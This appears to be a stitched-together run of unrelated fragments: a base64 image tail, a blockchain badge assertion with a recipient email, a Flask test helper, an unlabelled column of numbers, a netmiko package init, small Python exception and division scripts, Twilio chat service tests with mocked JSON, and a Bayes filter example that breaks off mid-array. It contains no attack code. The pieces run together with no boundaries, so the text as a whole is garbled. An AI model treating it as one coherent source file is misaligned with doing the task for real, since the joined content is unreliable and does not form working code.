JLQUAQEAQEAUEgLSAQz9xCzZJE8tofW9NCjaWOgoAgIAgIAoKAIJD6EWCCYfAKTJfMT/1VlhoKAoKAICAICAKCQFpAgEmGwSsi2JIRySud/sbbHGmh8lJHQUAQEAQEAUFAEEidCDDBuJouXbqCmTNnPoIawieDl/24OiR1VldqJQgIAoKAICAICAJpCIHPNcFAndXi6EwyMrE14wBv86ahB5GqCgKCgCAgCAgCgkAqQYCNFv+lT5/+7kyZMh3UVVLJuPjERT7QTR+UrSAgCAgCgoAgIAgIAk4QYC4x2EwwcK0iGdiJiYmZwwUGYl9EEBAEBAFBQBAQBAQBBwgsiYqKes23vJou0Qd5uiSCp02m87aJPiZbQUAQEAQEAUFAEBAErBBgA8X26OjoaryN8y1jWDJwggtc5YJPi0XDFyb5LAgIAoKAICAICAK+CDBfmMu8obI/goGyXiQDB0A0eOqkL28b89/POCYiCAgCgoAgIAgIAoKACQGsTdKTCQa4wnnTca9dr+kSrzP8AVEn8fHxnVlBD96XPBq+AMlnQUAQEAQEAUHg/wuB88wJJvIjx7JB4mSwRw9IMvTFTDAimWxU4M/1WXlp/nwb7+MvWpeRrSAgCAgCgoAgIAhcPwhwf3+R+/vfeIs1zvZGRkYuzJIly0oct/uU/wOyc8ss0o7O0QAAAABJRU5ErkJggg==" class="sc-jzJRlG bvIClq" style="width: 179px; height: 28px;" width="179" height="28" /></div>',
'id': 'urn:uuid:eff07e73-f0d1-47d5-99a1-74ca59e66d80',
'issuedOn': '2020-04-29T12:14:21.414121+00:00',
'recipient': {'hashed': False, 'identity': 'phaws@mail.com', 'type': 'email'},
'recipientProfile': {'name': 'Phaws',
'publicKey': '-',
'type': ['RecipientProfile', 'Extension']},
'signature': {'anchors': [{'chain': 'ethereumRopsten',
'sourceId': '0x0b54d876f976d03698ad17f47b8a7b7ffd94d90192056862b2a290c29db7fb89',
'type': 'ETHData'}],
'merkleRoot': '23338312ec71501d91d5f08ab32d8f6c69a66efc25e3eae9feb7ff65cf1a4514',
'proof': [{'right': 'c99d979aa7fcfed93bcb5c00044e65b361d9feb8a86fa93af6c67d2093068bef'},
{'right': 'cc2ba45bbaae7b380e049c2f654b7a4545206ffe49d4f0e83151fda19da3bd30'}],
'targetHash': '93e0724b10a6856e5882803935671e128784e5e6959f5a0e4c16ed00987d4f58',
'type': ['MerkleProof2017', 'Extension']},
'type': 'Assertion',
'verification': {'publicKey': '0x472C1a6080a84694990BA2B9a29Ceef672c91d31',
'type': ['MerkleProofVerification2017', 'Extension']}}
def throws(response: flask.Response, error: Type[AppError]) -> bool:
    """Assert that *response* carries the status and slug of the given error type."""
    status = response.status_code
    body = response.json
    assert error.code == status, status
    assert error.slugify_exception_name() == body.get('error'), body
    return True
| 1,036.474227
| 53,236
| 0.947905
| 6,752
| 201,076
| 28.212974
| 0.349082
| 0.004368
| 0.004116
| 0.001428
| 0.986031
| 0.985637
| 0.984661
| 0.983973
| 0.983553
| 0.982398
| 0
| 0.140496
| 0.014069
| 201,076
| 193
| 53,237
| 1,041.84456
| 0.820396
| 0.000497
| 0
| 0.202381
| 0
| 0.065476
| 0.977793
| 0.943026
| 0
| 1
| 0.000537
| 0
| 0.017857
| 1
| 0.065476
| false
| 0
| 0.053571
| 0.005952
| 0.136905
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
24cf59bcb37d6dd71bb326cbe95313d1b14ccdc5
| 112
|
py
|
Python
|
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | 1
|
2020-12-11T00:48:09.000Z
|
2020-12-11T00:48:09.000Z
|
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | null | null | null |
netmiko/h3c/__init__.py
|
TanY0Y0/netmiko
|
585c9f0dd4a08608c5019341eb6546f4c8c28138
|
[
"MIT"
] | null | null | null |
# Public connection classes for H3C devices.
from netmiko.h3c.h3c import H3CSSH, H3CTelnet

__all__ = ["H3CSSH", "H3CTelnet"]
| 22.4
| 38
| 0.741071
| 15
| 112
| 5.266667
| 0.466667
| 0.278481
| 0.35443
| 0.43038
| 0.582278
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084211
| 0.151786
| 112
| 4
| 39
| 28
| 0.747368
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
24fdf9b18041b922fdf768f920a5987bbeb98f9d
| 218
|
py
|
Python
|
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
baseconverter/exceptions.py
|
antoniovilarinholopes/converttodecimal
|
8fe58c4b7409d83ed66fb4b99f8953acf47bad88
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3.4
class InvalidDigitForBaseException(RuntimeError):
    """Raised when a digit is not valid for the numeric base being converted.

    Fix: delegate to ``RuntimeError.__init__`` instead of assigning
    ``self.args = arg``. The ``BaseException.args`` setter coerces its value
    with ``tuple(arg)``, so the old code split a string message into single
    characters (and raised ``TypeError`` for non-iterable arguments).
    ``super().__init__(arg)`` stores the conventional ``(arg,)`` tuple and
    makes ``str(exc)`` render the message itself.
    """

    def __init__(self, arg):
        super().__init__(arg)
class NotAllNumCharsException(RuntimeError):
    """Raised when the input contains characters that are not digits.

    Fix: delegate to ``RuntimeError.__init__`` instead of assigning
    ``self.args = arg``. The ``BaseException.args`` setter coerces its value
    with ``tuple(arg)``, so the old code split a string message into single
    characters (and raised ``TypeError`` for non-iterable arguments).
    ``super().__init__(arg)`` stores the conventional ``(arg,)`` tuple and
    makes ``str(exc)`` render the message itself.
    """

    def __init__(self, arg):
        super().__init__(arg)
| 21.8
| 49
| 0.720183
| 24
| 218
| 6.208333
| 0.541667
| 0.201342
| 0.255034
| 0.308725
| 0.496644
| 0.496644
| 0.496644
| 0.496644
| 0
| 0
| 0
| 0.01105
| 0.169725
| 218
| 9
| 50
| 24.222222
| 0.812155
| 0.087156
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
709a2d251a5aff5211450a28d997a345d6c9a558
| 1,456
|
py
|
Python
|
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
shldn/tests/test-data/div.py
|
arrieta/shldn
|
8335aaeb1bfe91698bd9dfb83487393ede9225e6
|
[
"MIT"
] | null | null | null |
if __name__ == "__main__":
    # Script entry point: prints a handful of division expressions.
    # NOTE(review): this file appears to be fixture input for a tool that
    # detects division operations (path suggests tests/test-data) -- the
    # divisions themselves are the payload, so do not "simplify" them away.
    print("Hello Division World!")
    print("Here are a few divisions:")
    print(f"1 / 2 = {1/2:3.3}")
    print(f"10 / 2 = {10/2}")
    print(f"(71 / 23) / 53.32 = {(71 / 23) / 53.32:3.3}")
def pilin():
    """Print the same division samples as the __main__ block.

    Deliberate duplicate of the module-level statements above -- presumably so
    the divisions appear both at module scope and inside a function body
    (fixture for a division-finding tool; verify against the consuming tests).
    """
    print("Hello Division World!")
    print("Here are a few divisions:")
    print(f"1 / 2 = {1/2:3.3}")
    print(f"10 / 2 = {10/2}")
    print(f"(71 / 23) / 53.32 = {(71 / 23) / 53.32:3.3}")
1/4  # bare division expression, evaluated and discarded -- fixture statement, keep as-is
| 1.402697
| 57
| 0.151099
| 79
| 1,456
| 2.683544
| 0.303797
| 0.169811
| 0.113208
| 0.150943
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0.90566
| 0
| 0.189602
| 0.775412
| 1,456
| 1,037
| 58
| 1.40405
| 0.458716
| 0
| 0
| 0.769231
| 0
| 0.153846
| 0.171703
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.076923
| true
| 0
| 0
| 0
| 0.076923
| 0.769231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
5606a370ce800e3e412bddb3dfe82416cafb10e3
| 22,828
|
py
|
Python
|
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
tests/integration/chat/v1/test_service.py
|
angmunpri/twilio-python
|
d6ed1098f4bc06529d68f965eabdf87642ac441c
|
[
"MIT"
] | null | null | null |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ServiceTestCase(IntegrationTestCase):
def test_fetch_request(self):
    """fetch() must raise TwilioException on a 500 and issue the expected GET."""
    self.holodeck.mock(Response(500, ''))

    with self.assertRaises(TwilioException):
        self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()

    expected = Request(
        'get',
        'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    )
    self.holodeck.assert_has_request(expected)
def test_fetch_response(self):
    """fetch() deserializes a canned 200 service payload into a non-None object."""
    self.holodeck.mock(Response(
        200,
        '''
        {
            "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "consumption_report_interval": 100,
            "date_created": "2015-07-30T20:00:00Z",
            "date_updated": "2015-07-30T20:00:00Z",
            "default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "friendly_name": "friendly_name",
            "limits": {
                "channel_members": 100,
                "user_channels": 250
            },
            "links": {
                "channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
                "users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
                "roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
            },
            "notifications": {},
            "post_webhook_url": "post_webhook_url",
            "pre_webhook_url": "pre_webhook_url",
            "reachability_enabled": false,
            "read_status_enabled": false,
            "sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "typing_indicator_timeout": 100,
            "url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "webhook_filters": [
                "webhook_filters"
            ],
            "webhook_method": "webhook_method",
            "webhooks": {}
        }
        '''
    ))

    actual = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()

    self.assertIsNotNone(actual)
def test_delete_request(self):
    """delete() must raise TwilioException on a 500 and issue the expected DELETE."""
    self.holodeck.mock(Response(500, ''))

    with self.assertRaises(TwilioException):
        self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()

    expected = Request(
        'delete',
        'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
    )
    self.holodeck.assert_has_request(expected)
def test_delete_response(self):
    """A canned 204 reply makes delete() return a truthy result."""
    canned = Response(
        204,
        None,
    )
    self.holodeck.mock(canned)

    outcome = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()

    self.assertTrue(outcome)
def test_create_request(self):
    """create() must raise TwilioException on a 500 and POST the friendly name."""
    self.holodeck.mock(Response(500, ''))

    with self.assertRaises(TwilioException):
        self.client.chat.v1.services.create(friendly_name="friendly_name")

    payload = {'FriendlyName': "friendly_name", }
    expected = Request(
        'post',
        'https://chat.twilio.com/v1/Services',
        data=payload,
    )
    self.holodeck.assert_has_request(expected)
def test_create_response(self):
    """create() deserializes a canned 201 service payload into a non-None object."""
    self.holodeck.mock(Response(
        201,
        '''
        {
            "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "consumption_report_interval": 100,
            "date_created": "2015-07-30T20:00:00Z",
            "date_updated": "2015-07-30T20:00:00Z",
            "default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "friendly_name": "friendly_name",
            "limits": {
                "channel_members": 100,
                "user_channels": 250
            },
            "links": {
                "channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
                "users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
                "roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
            },
            "notifications": {},
            "post_webhook_url": "post_webhook_url",
            "pre_webhook_url": "pre_webhook_url",
            "reachability_enabled": false,
            "read_status_enabled": false,
            "sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "typing_indicator_timeout": 100,
            "url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
            "webhook_filters": [
                "webhook_filters"
            ],
            "webhook_method": "webhook_method",
            "webhooks": {}
        }
        '''
    ))

    actual = self.client.chat.v1.services.create(friendly_name="friendly_name")

    self.assertIsNotNone(actual)
def test_list_request(self):
    """list() must raise TwilioException on a 500 and issue the expected GET."""
    self.holodeck.mock(Response(500, ''))

    with self.assertRaises(TwilioException):
        self.client.chat.v1.services.list()

    expected = Request(
        'get',
        'https://chat.twilio.com/v1/Services',
    )
    self.holodeck.assert_has_request(expected)
def test_read_empty_response(self):
    """list() handles an empty services page and still returns a non-None result."""
    self.holodeck.mock(Response(
        200,
        '''
        {
            "meta": {
                "first_page_url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0",
                "key": "services",
                "next_page_url": null,
                "page": 0,
                "page_size": 50,
                "previous_page_url": null,
                "url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0"
            },
            "services": []
        }
        '''
    ))

    actual = self.client.chat.v1.services.list()

    self.assertIsNotNone(actual)
def test_read_full_response(self):
    """list() deserializes a fully-populated services page into a non-None result."""
    self.holodeck.mock(Response(
        200,
        '''
        {
            "meta": {
                "first_page_url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0",
                "key": "services",
                "next_page_url": null,
                "page": 0,
                "page_size": 50,
                "previous_page_url": null,
                "url": "https://chat.twilio.com/v1/Services?PageSize=50&Page=0"
            },
            "services": [
                {
                    "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "consumption_report_interval": 100,
                    "date_created": "2015-07-30T20:00:00Z",
                    "date_updated": "2015-07-30T20:00:00Z",
                    "default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "friendly_name": "friendly_name",
                    "limits": {
                        "user_channels": 250,
                        "channel_members": 100,
                        "actions_per_second": 30
                    },
                    "links": {
                        "channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
                        "users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
                        "roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
                    },
                    "notifications": {
                        "added_to_channel": {
                            "enabled": false,
                            "template": "notifications.added_to_channel.template"
                        },
                        "invited_to_channel": {
                            "enabled": false,
                            "template": "notifications.invited_to_channel.template"
                        },
                        "log_enabled": true,
                        "new_message": {
                            "enabled": false,
                            "template": "notifications.new_message.template"
                        },
                        "removed_from_channel": {
                            "enabled": false,
                            "template": "notifications.removed_from_channel.template"
                        }
                    },
                    "post_webhook_url": "post_webhook_url",
                    "pre_webhook_url": "pre_webhook_url",
                    "reachability_enabled": false,
                    "read_status_enabled": false,
                    "sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "typing_indicator_timeout": 100,
                    "url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                    "webhook_filters": [
                        "webhook_filters"
                    ],
                    "webhook_method": "webhook_method",
                    "webhooks": {
                        "on_channel_add": {
                            "format": "webhooks.on_channel_add.format",
                            "method": "webhooks.on_channel_add.method",
                            "url": "webhooks.on_channel_add.url"
                        },
                        "on_channel_added": {
                            "format": "webhooks.on_channel_added.format",
                            "method": "webhooks.on_channel_added.method",
                            "url": "webhooks.on_channel_added.url"
                        },
                        "on_channel_destroy": {
                            "format": "webhooks.on_channel_destroy.format",
                            "method": "webhooks.on_channel_destroy.method",
                            "url": "webhooks.on_channel_destroy.url"
                        },
                        "on_channel_destroyed": {
                            "format": "webhooks.on_channel_destroyed.format",
                            "method": "webhooks.on_channel_destroyed.method",
                            "url": "webhooks.on_channel_destroyed.url"
                        },
                        "on_channel_update": {
                            "format": "webhooks.on_channel_update.format",
                            "method": "webhooks.on_channel_update.method",
                            "url": "webhooks.on_channel_update.url"
                        },
                        "on_channel_updated": {
                            "format": "webhooks.on_channel_updated.format",
                            "method": "webhooks.on_channel_updated.method",
                            "url": "webhooks.on_channel_updated.url"
                        },
                        "on_member_add": {
                            "format": "webhooks.on_member_add.format",
                            "method": "webhooks.on_member_add.method",
                            "url": "webhooks.on_member_add.url"
                        },
                        "on_member_added": {
                            "format": "webhooks.on_member_added.format",
                            "method": "webhooks.on_member_added.method",
                            "url": "webhooks.on_member_added.url"
                        },
                        "on_member_remove": {
                            "format": "webhooks.on_member_remove.format",
                            "method": "webhooks.on_member_remove.method",
                            "url": "webhooks.on_member_remove.url"
                        },
                        "on_member_removed": {
                            "format": "webhooks.on_member_removed.format",
                            "method": "webhooks.on_member_removed.method",
                            "url": "webhooks.on_member_removed.url"
                        },
                        "on_message_remove": {
                            "format": "webhooks.on_message_remove.format",
                            "method": "webhooks.on_message_remove.method",
                            "url": "webhooks.on_message_remove.url"
                        },
                        "on_message_removed": {
                            "format": "webhooks.on_message_removed.format",
                            "method": "webhooks.on_message_removed.method",
                            "url": "webhooks.on_message_removed.url"
                        },
                        "on_message_send": {
                            "format": "webhooks.on_message_send.format",
                            "method": "webhooks.on_message_send.method",
                            "url": "webhooks.on_message_send.url"
                        },
                        "on_message_sent": {
                            "format": "webhooks.on_message_sent.format",
                            "method": "webhooks.on_message_sent.method",
                            "url": "webhooks.on_message_sent.url"
                        },
                        "on_message_update": {
                            "format": "webhooks.on_message_update.format",
                            "method": "webhooks.on_message_update.method",
                            "url": "webhooks.on_message_update.url"
                        },
                        "on_message_updated": {
                            "format": "webhooks.on_message_updated.format",
                            "method": "webhooks.on_message_updated.method",
                            "url": "webhooks.on_message_updated.url"
                        }
                    }
                }
            ]
        }
        '''
    ))

    actual = self.client.chat.v1.services.list()

    self.assertIsNotNone(actual)
    def test_update_request(self):
        """Verify Service.update() issues a POST to the expected Services URL.

        The mocked 500 response makes the client raise TwilioException, but
        the outgoing request is still recorded by holodeck and asserted on.
        """
        self.holodeck.mock(Response(500, ''))
        with self.assertRaises(TwilioException):
            self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
        self.holodeck.assert_has_request(Request(
            'post',
            'https://chat.twilio.com/v1/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
        ))
    def test_update_response(self):
        """Verify Service.update() parses a mocked 200 payload into a non-None instance."""
        self.holodeck.mock(Response(
            200,
            '''
            {
                "account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "consumption_report_interval": 100,
                "date_created": "2015-07-30T20:00:00Z",
                "date_updated": "2015-07-30T20:00:00Z",
                "default_channel_creator_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "default_channel_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "default_service_role_sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "friendly_name": "friendly_name",
                "limits": {
                    "channel_members": 500,
                    "user_channels": 600
                },
                "links": {
                    "channels": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels",
                    "users": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Users",
                    "roles": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Roles"
                },
                "notifications": {
                    "added_to_channel": {
                        "enabled": false,
                        "template": "notifications.added_to_channel.template"
                    },
                    "invited_to_channel": {
                        "enabled": false,
                        "template": "notifications.invited_to_channel.template"
                    },
                    "new_message": {
                        "enabled": false,
                        "template": "notifications.new_message.template"
                    },
                    "removed_from_channel": {
                        "enabled": false,
                        "template": "notifications.removed_from_channel.template"
                    }
                },
                "post_webhook_url": "post_webhook_url",
                "pre_webhook_url": "pre_webhook_url",
                "reachability_enabled": false,
                "read_status_enabled": false,
                "sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "typing_indicator_timeout": 100,
                "url": "https://chat.twilio.com/v1/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
                "webhook_filters": [
                    "webhook_filters"
                ],
                "webhook_method": "webhook_method",
                "webhooks": {
                    "on_channel_add": {
                        "format": "webhooks.on_channel_add.format",
                        "method": "webhooks.on_channel_add.method",
                        "url": "webhooks.on_channel_add.url"
                    },
                    "on_channel_added": {
                        "format": "webhooks.on_channel_added.format",
                        "method": "webhooks.on_channel_added.method",
                        "url": "webhooks.on_channel_added.url"
                    },
                    "on_channel_destroy": {
                        "format": "webhooks.on_channel_destroy.format",
                        "method": "webhooks.on_channel_destroy.method",
                        "url": "webhooks.on_channel_destroy.url"
                    },
                    "on_channel_destroyed": {
                        "format": "webhooks.on_channel_destroyed.format",
                        "method": "webhooks.on_channel_destroyed.method",
                        "url": "webhooks.on_channel_destroyed.url"
                    },
                    "on_channel_update": {
                        "format": "webhooks.on_channel_update.format",
                        "method": "webhooks.on_channel_update.method",
                        "url": "webhooks.on_channel_update.url"
                    },
                    "on_channel_updated": {
                        "format": "webhooks.on_channel_updated.format",
                        "method": "webhooks.on_channel_updated.method",
                        "url": "webhooks.on_channel_updated.url"
                    },
                    "on_member_add": {
                        "format": "webhooks.on_member_add.format",
                        "method": "webhooks.on_member_add.method",
                        "url": "webhooks.on_member_add.url"
                    },
                    "on_member_added": {
                        "format": "webhooks.on_member_added.format",
                        "method": "webhooks.on_member_added.method",
                        "url": "webhooks.on_member_added.url"
                    },
                    "on_member_remove": {
                        "format": "webhooks.on_member_remove.format",
                        "method": "webhooks.on_member_remove.method",
                        "url": "webhooks.on_member_remove.url"
                    },
                    "on_member_removed": {
                        "format": "webhooks.on_member_removed.format",
                        "method": "webhooks.on_member_removed.method",
                        "url": "webhooks.on_member_removed.url"
                    },
                    "on_message_remove": {
                        "format": "webhooks.on_message_remove.format",
                        "method": "webhooks.on_message_remove.method",
                        "url": "webhooks.on_message_remove.url"
                    },
                    "on_message_removed": {
                        "format": "webhooks.on_message_removed.format",
                        "method": "webhooks.on_message_removed.method",
                        "url": "webhooks.on_message_removed.url"
                    },
                    "on_message_send": {
                        "format": "webhooks.on_message_send.format",
                        "method": "webhooks.on_message_send.method",
                        "url": "webhooks.on_message_send.url"
                    },
                    "on_message_sent": {
                        "format": "webhooks.on_message_sent.format",
                        "method": "webhooks.on_message_sent.method",
                        "url": "webhooks.on_message_sent.url"
                    },
                    "on_message_update": {
                        "format": "webhooks.on_message_update.format",
                        "method": "webhooks.on_message_update.method",
                        "url": "webhooks.on_message_update.url"
                    },
                    "on_message_updated": {
                        "format": "webhooks.on_message_updated.format",
                        "method": "webhooks.on_message_updated.method",
                        "url": "webhooks.on_message_updated.url"
                    }
                }
            }
            '''
        ))
        actual = self.client.chat.v1.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
        self.assertIsNotNone(actual)
| 46.587755
| 122
| 0.471833
| 1,668
| 22,828
| 6.161871
| 0.083333
| 0.095349
| 0.062853
| 0.068496
| 0.952228
| 0.94639
| 0.936369
| 0.935396
| 0.918272
| 0.90358
| 0
| 0.0192
| 0.42277
| 22,828
| 489
| 123
| 46.683027
| 0.760795
| 0.004775
| 0
| 0.611765
| 1
| 0
| 0.15812
| 0.05812
| 0
| 0
| 0
| 0
| 0.188235
| 1
| 0.129412
| false
| 0
| 0.047059
| 0
| 0.188235
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
560f735af0caf01032dd148675978faeb4bdbb0e
| 3,722
|
py
|
Python
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 1,653
|
2016-05-06T02:56:08.000Z
|
2022-03-26T16:34:30.000Z
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 94
|
2016-04-09T04:40:08.000Z
|
2022-03-31T08:52:17.000Z
|
examples/ex_bayes_filter.py
|
KayaDevSolutions/deepgaze
|
a6d444c70bb75ffcfc23d3b31a0567711fb956a7
|
[
"MIT"
] | 514
|
2016-08-28T01:47:56.000Z
|
2022-01-30T13:42:39.000Z
|
from deepgaze.bayes_filter import DiscreteBayesFilter
import numpy as np

# Demo: a discrete Bayes filter tracking a target over a 10-state ring.
# Each phase of the scenario alternates a motion-model prediction with a
# measurement update, then prints the most likely (MAP) state.

my_filter = DiscreteBayesFilter(10)

# Motion model CPT: from each state the target stays put with p=0.8 and
# drifts to either neighbour with p=0.1 (rows 0 and 9 wrap around).
cpt_motion_model = np.array([[0.8, 0.1, 0, 0, 0, 0, 0, 0, 0, 0.1],
                             [0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0, 0],
                             [0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0],
                             [0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0, 0],
                             [0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0, 0],
                             [0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0, 0],
                             [0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0, 0],
                             [0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1, 0],
                             [0, 0, 0, 0, 0, 0, 0, 0.1, 0.8, 0.1],
                             [0.1, 0, 0, 0, 0, 0, 0, 0, 0.1, 0.8]], dtype=np.float32)

# Measurement accuracy CPT: mostly a sharp 0.8 diagonal; rows 0 and 3 are
# deliberately noisier to model an unreliable sensor around those states.
cpt_measurement_accuracy = np.array([[0.6, 0.2, 0.1, 0.1, 0, 0, 0, 0, 0, 0],
                                     [0.1, 0.8, 0.1, 0, 0, 0, 0, 0, 0, 0],
